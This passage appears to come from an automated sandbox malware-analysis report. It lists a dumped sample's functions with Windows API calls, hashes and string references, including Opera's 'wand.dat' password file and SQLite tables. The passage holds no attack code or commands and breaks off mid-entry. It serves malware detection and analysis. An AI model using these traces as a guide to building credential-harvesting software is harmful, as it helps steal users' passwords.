                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                • String ID: SHAutoComplete$shlwapi.dll
                                                • API String ID: 3150196962-1506664499
                                                • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy$memcmp
                                                • String ID:
                                                • API String ID: 3384217055-0
                                                • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$memcpy
                                                • String ID:
                                                • API String ID: 368790112-0
                                                • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                  • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                  • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                • GetMenu.USER32(?), ref: 00410F8D
                                                • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                • String ID:
                                                • API String ID: 1889144086-0
                                                • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                • GetLastError.KERNEL32 ref: 0041810A
                                                • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateErrorHandleLastMappingView
                                                • String ID:
                                                • API String ID: 1661045500-0
                                                • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                • memcpy.MSVCRT ref: 0042EC7A
                                                Strings
                                                • sqlite_altertab_%s, xrefs: 0042EC4C
                                                • virtual tables may not be altered, xrefs: 0042EBD2
                                                • Cannot add a column to a view, xrefs: 0042EBE8
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpymemset
                                                • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                • API String ID: 1297977491-2063813899
                                                • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 0040560C
                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                • String ID: *.*$dat$wand.dat
                                                • API String ID: 2618321458-1828844352
                                                • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                • wcslen.MSVCRT ref: 00410C74
                                                • _wtoi.MSVCRT ref: 00410C80
                                                • _wcsicmp.MSVCRT ref: 00410CCE
                                                • _wcsicmp.MSVCRT ref: 00410CDF
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                • String ID:
                                                • API String ID: 1549203181-0
                                                • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 00412057
                                                  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                • GetKeyState.USER32(00000010), ref: 0041210D
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                • String ID:
                                                • API String ID: 3550944819-0
                                                • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040A8D0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                Download Yara Rule
                                                APIs
                                                • wcslen.MSVCRT ref: 0040A8E2
                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                • memcpy.MSVCRT ref: 0040A94F
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@$memcpy$mallocwcslen
                                                • String ID:
                                                • API String ID: 3023356884-0
                                                • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040B1D1 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                Download Yara Rule
                                                APIs
                                                • wcslen.MSVCRT ref: 0040B1DE
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                • memcpy.MSVCRT ref: 0040B248
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@$memcpy$mallocwcslen
                                                • String ID:
                                                • API String ID: 3023356884-0
                                                • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy
                                                • String ID: @
                                                • API String ID: 3510742995-2766056989
                                                • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@??3@memcpymemset
                                                • String ID:
                                                • API String ID: 1865533344-0
                                                • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040B0D1 Relevance: 6.1, APIs: 4, Instructions: 55stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • strlen.MSVCRT ref: 0040B0D8
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                • memcpy.MSVCRT ref: 0040B159
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@$memcpy$mallocstrlen
                                                • String ID:
                                                • API String ID: 1171893557-0
                                                • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 004144E7
                                                  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                  • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                • memset.MSVCRT ref: 0041451A
                                                • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                • String ID:
                                                • API String ID: 1127616056-0
                                                • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy$memset
                                                • String ID: sqlite_master
                                                • API String ID: 438689982-3163232059
                                                • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                Download Yara Rule
                                                APIs
                                                • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                • wcscpy.MSVCRT ref: 00414DF3
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: BrowseFolderFromListMallocPathwcscpy
                                                • String ID:
                                                • API String ID: 3917621476-0
                                                • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                • _snwprintf.MSVCRT ref: 00410FE1
                                                • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                • _snwprintf.MSVCRT ref: 0041100C
                                                • wcscat.MSVCRT ref: 0041101F
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                • String ID:
                                                • API String ID: 822687973-0
                                                • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                Download Yara Rule
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                • malloc.MSVCRT ref: 00417459
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$??3@malloc
                                                • String ID:
                                                • API String ID: 4284152360-0
                                                • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                • RegisterClassW.USER32(?), ref: 00412428
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: HandleModule$ClassCreateRegisterWindow
                                                • String ID:
                                                • API String ID: 2678498856-0
                                                • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,?), ref: 00409B40
                                                • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: MessageSend$Item
                                                • String ID:
                                                • API String ID: 3888421826-0
                                                • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                Download Yara Rule
                                                APIs
